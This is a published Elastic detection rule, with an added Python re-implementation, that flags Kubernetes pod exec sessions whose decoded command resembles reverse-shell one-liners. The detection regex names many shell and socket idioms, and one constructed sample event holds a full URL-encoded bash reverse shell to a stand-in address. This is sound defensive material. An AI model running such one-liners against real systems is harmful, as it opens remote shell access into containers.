Kubernetes Pod Exec Potential Reverse Shell

Flags exec into a pod when the URL-decoded command payload resembles reverse-shell or bind-shell one-liner invocation patterns. Legitimate debug sessions sometimes use similar building blocks, but together these patterns align with post-exploitation interactive access and command-and-control.

Elastic rule (View on GitHub)

[metadata]
creation_date = "2026/04/23"
integration = ["kubernetes"]
maturity = "production"
updated_date = "2026/04/23"

[rule]
author = ["Elastic"]
description = """
Flags exec into a pod when the URL-decoded command payload resembles reverse-shell or bind-shell
one-liner invocation patterns. Legitimate debug sessions sometimes use similar building blocks, but together
these patterns align with post-exploitation interactive access and command-and-control.
"""
from = "now-6m"
interval = "5m"
language = "esql"
license = "Elastic License v2"
name = "Kubernetes Pod Exec Potential Reverse Shell"
note = """## Triage and analysis

### Investigating Kubernetes Pod Exec Potential Reverse Shell

The rule inspects Kubernetes audit exec requestURI values, URL-decodes them, parses the command query fragment, and
matches high-signal shell and socket idioms often used to obtain a callback shell from inside a container.

### Possible investigation steps

- Identify the actor (kubernetes.audit.user.username, groups, impersonation), source IP, and user agent
  (human kubectl vs automation).
- Resolve the target namespace, pod, and container from kubernetes.audit.objectRef.* and correlate with
  workload ownership and change tickets.
- Pull the raw and decoded URI from the alert document and replay the inferred command in a sandbox only if policy
  allows—otherwise rely on audit and platform logs.
- Hunt nearby events from the same identity: secret reads, pods/exec to other workloads, RoleBinding
  changes, or anonymous API use.

### False positive analysis

- Security training, CTF-style images, or vendor diagnostics may include bash redirection or /dev/tcp examples;
  baseline approved images and break-glass accounts.
- Some observability or mesh sidecars use socat or sockets in ways that could overlap; validate container image and
  command lineage.

### Response and remediation

- If malicious, terminate the exec session, isolate the workload or node, rotate credentials reachable from the
  pod, and revoke pods/exec for the abused principal unless strictly required.
"""
references = [
    "https://attack.mitre.org/techniques/T1609/",
    "https://attack.mitre.org/techniques/T1059/",
]
risk_score = 73
rule_id = "f1a2b3c4-d5e6-4789-a012-3456789abc01"
severity = "high"
tags = [
    "Data Source: Kubernetes",
    "Domain: Kubernetes",
    "Use Case: Threat Detection",
    "Tactic: Execution",
    "Tactic: Command and Control",
    "Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
query = '''
FROM logs-kubernetes.audit_logs-* metadata _id, _index, _version
| WHERE kubernetes.audit.objectRef.subresource == "exec"
  AND kubernetes.audit.requestURI LIKE "*command=*"
| EVAL decoded_uri = URL_DECODE(kubernetes.audit.requestURI)
| GROK decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}"
| EVAL command = REPLACE(raw_commands, "command=", "")
| EVAL command = REPLACE(command, "&", " ")
| EVAL Esql.executed_command = REPLACE(command, "\\+", " ")
| WHERE Esql.executed_command IS NOT NULL
| WHERE Esql.executed_command IS NOT NULL AND command RLIKE """.*(/dev/tcp/|/dev/udp/|zsh/net/tcp|zsh/net/udp|nc\s+-e|ncat\s+-e|netcat\s+-e|nc\s.*\s-c\s|mkfifo|socat\s.*exec|socat\s.*pty|bash\s+-i\s+>&|0>&1|>&\s*/dev/tcp|import\s+socket.*connect|import\s+pty.*spawn|socket\.socket.*connect|IO::Socket::INET|fsockopen|TCPSocket\.new|/inet/tcp/).*""" AND
  // local service health check patterns
  NOT command RLIKE """.*/dev/tcp/(localhost|127\.0\.0\.1)/(8080|8443|9090|3000|5000|8888|80|443).*"""
| KEEP *
'''

[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1609"
name = "Container Administration Command"
reference = "https://attack.mitre.org/techniques/T1609/"

[[rule.threat.technique]]
id = "T1059"
name = "Command and Scripting Interpreter"
reference = "https://attack.mitre.org/techniques/T1059/"

[rule.threat.tactic]
id = "TA0002"
name = "Execution"
reference = "https://attack.mitre.org/tactics/TA0002/"
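To make the rule's pipeline concrete (URL-decode the exec requestURI, rebuild the command from the repeated command= parameters, match the shell and socket idioms, then drop the local health-check exclusion), here is an added Python re-implementation run over constructed audit events. It is example code written for this page, not part of the Elastic rule or its test suite; the regexes are copied from the rule's two RLIKE clauses, while the event dictionaries, usernames, pod names and the 203.0.113.5 documentation address are constructed sample data.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# High-signal idioms, copied from the rule's first RLIKE clause.
REVERSE_SHELL_RE = re.compile(
    r"(/dev/tcp/|/dev/udp/|zsh/net/tcp|zsh/net/udp|nc\s+-e|ncat\s+-e|netcat\s+-e|"
    r"nc\s.*\s-c\s|mkfifo|socat\s.*exec|socat\s.*pty|bash\s+-i\s+>&|0>&1|>&\s*/dev/tcp|"
    r"import\s+socket.*connect|import\s+pty.*spawn|socket\.socket.*connect|"
    r"IO::Socket::INET|fsockopen|TCPSocket\.new|/inet/tcp/)"
)
# Local service health-check exclusion, copied from the rule's NOT RLIKE clause.
LOCAL_HEALTH_RE = re.compile(
    r"/dev/tcp/(localhost|127\.0\.0\.1)/(8080|8443|9090|3000|5000|8888|80|443)"
)

# Constructed sample audit events (subresource and requestURI mirror the
# kubernetes.audit.objectRef.subresource / kubernetes.audit.requestURI fields).
SAMPLE_AUDIT_EVENTS = [
    {"user": "alice", "subresource": "exec",
     "requestURI": "/api/v1/namespaces/dev/pods/web-0/exec"
                   "?command=ls&command=-la&command=%2Fapp&container=web&stdout=true"},
    {"user": "healthcheck-sa", "subresource": "exec",
     "requestURI": "/api/v1/namespaces/prod/pods/api-1/exec"
                   "?command=bash&command=-c&command=echo+%3E+%2Fdev%2Ftcp%2F127.0.0.1%2F8080"
                   "&container=api&stdout=true"},
    {"user": "system:serviceaccount:default:build", "subresource": "exec",
     "requestURI": "/api/v1/namespaces/prod/pods/api-1/exec"
                   "?command=bash&command=-c"
                   "&command=bash+-i+%3E%26+%2Fdev%2Ftcp%2F203.0.113.5%2F4444+0%3E%261"
                   "&container=api&stdin=true&stdout=true&tty=true"},
    {"user": "bob", "subresource": "log",
     "requestURI": "/api/v1/namespaces/dev/pods/web-0/log?container=web"},
]


def extract_command(request_uri):
    """Rebuild the exec'd argv from the repeated command= query parameters.

    parse_qsl splits on '&' first and then percent-decodes each value (and turns
    '+' into a space), so an encoded '&' inside an argument stays in that argument.
    """
    query = urlsplit(request_uri).query
    args = [v for k, v in parse_qsl(query, keep_blank_values=True) if k == "command"]
    return " ".join(args)


def classify(event):
    """Return (decoded_command, verdict); verdict is 'alert', 'excluded' or None."""
    uri = event.get("requestURI", "")
    if event.get("subresource") != "exec" or "command=" not in uri:
        return None, None
    command = extract_command(uri)
    if not REVERSE_SHELL_RE.search(command):
        return command, None
    if LOCAL_HEALTH_RE.search(command):
        return command, "excluded"   # /dev/tcp to a local service port: health check
    return command, "alert"


def find_alerts(events):
    """Run the classifier over a batch of audit events and keep only alerts."""
    alerts = []
    for event in events:
        command, verdict = classify(event)
        if verdict == "alert":
            alerts.append({"user": event["user"], "command": command})
    return alerts


if __name__ == "__main__":
    for event in SAMPLE_AUDIT_EVENTS:
        command, verdict = classify(event)
        print(f"{event['user']:<40} {verdict or '-':<9} {command}")
```

One difference from the ES|QL query is worth knowing when triaging: the rule URL-decodes the whole requestURI before splitting on `&`, so a percent-encoded `&` inside an argument becomes a space in Esql.executed_command, and an idiom such as `0>&1` may then only be caught via a neighbouring token like `/dev/tcp/`. Parsing the query string per parameter, as above, keeps the original argument boundaries and is the form to use when replaying the decoded command from the alert document.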
